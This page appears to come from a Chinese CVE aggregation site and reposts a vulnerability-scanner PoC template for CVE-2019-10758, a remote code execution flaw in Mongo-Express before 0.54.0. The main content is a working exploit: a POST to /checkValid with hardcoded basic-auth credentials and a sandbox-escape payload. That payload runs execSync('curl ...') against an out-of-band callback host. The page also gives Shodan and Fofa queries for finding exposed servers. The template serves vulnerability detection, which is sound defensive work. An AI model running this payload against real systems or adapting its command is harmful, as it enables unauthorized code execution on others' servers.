CVE-2019-10758: Mongo-Express Remote Code Execution

日期: 2025-09-01 | 影响软件: Mongo-Express | POC: 已公开

漏洞描述

mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment. Shodan: http.title:"Mongo Express" Fofa: title="Mongo Express"

PoC代码[已公开]

id: CVE-2019-10758

info:
  name: Mongo-Express Remote Code Execution
  author: princechaddha
  severity: critical
  verified: true
  description: |-
    mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.
    Shodan: http.title:"Mongo Express"
    Fofa: title="Mongo Express"
  reference:
    - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10758
  remediation: This issue will be fixed by updating to the latest version of mongo-express
  metadata:
    shodan-query: http.title:"Mongo Express"
  tags: cve,cve2019,mongo,mongo-express

set:
  oob: oob()
  oobHTTP: oob.HTTP
rules:
  r0:
    request:
      method: POST
      path: /checkValid
      headers:
        Authorization: Basic YWRtaW46cGFzcw==
      body: document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{oobHTTP}}")
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2019/CVE-2019-10758.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2020-24391: Mongo-Express - Remote Code Execution POC

CVE-2019-0193: Apache Solr Remote Code Execution POC

CVE-2019-0230: Apache Struts <=2.5.20 - Remote Code Execution S2-059 POC

CVE-2019-11581: Atlassian Jira未授权服务端模板注入漏洞 POC

CVE-2019-12725: Zeroshell 3.9.0 Remote Command Execution POC